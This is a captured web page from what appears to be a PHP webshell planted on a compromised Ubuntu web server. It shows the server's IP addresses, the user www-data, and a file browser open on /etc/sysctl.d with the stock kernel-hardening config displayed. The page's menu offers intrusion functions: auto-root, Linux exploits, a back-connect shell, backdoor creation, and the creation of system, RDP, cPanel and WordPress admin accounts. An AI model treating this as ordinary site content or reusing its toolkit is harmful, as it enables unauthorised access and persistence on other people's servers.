Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.144.243.30
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
sysctl.d /
[ HOME SHELL ]
Name
Size
Permission
Action
10-console-messages.conf
77
B
-rw-r--r--
10-ipv6-privacy.conf
490
B
-rw-r--r--
10-kernel-hardening.conf
726
B
-rw-r--r--
10-link-restrictions.conf
257
B
-rw-r--r--
10-lxd-inotify.conf
153
B
-rw-r--r--
10-magic-sysrq.conf
1.16
KB
-rw-r--r--
10-network-security.conf
509
B
-rw-r--r--
10-ptrace.conf
1.26
KB
-rw-r--r--
10-zeropage.conf
506
B
-rw-r--r--
99-cloudimg-ipv6.conf
185
B
-rw-r--r--
99-sysctl.conf
2.62
KB
-rw-r--r--
README
519
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 10-kernel-hardening.conf
# These settings are specific to hardening the kernel itself from attack # from userspace, rather than protecting userspace from other malicious # userspace things. # # # When an attacker is trying to exploit the local kernel, it is often # helpful to be able to examine where in memory the kernel, modules, # and data structures live. As such, kernel addresses should be treated # as sensitive information. # # Many files and interfaces contain these addresses (e.g. /proc/kallsyms, # /proc/modules, etc), and this setting can censor the addresses. A value # of "0" allows all users to see the kernel addresses. A value of "1" # limits visibility to the root user, and "2" blocks even the root user. kernel.kptr_restrict = 1
Close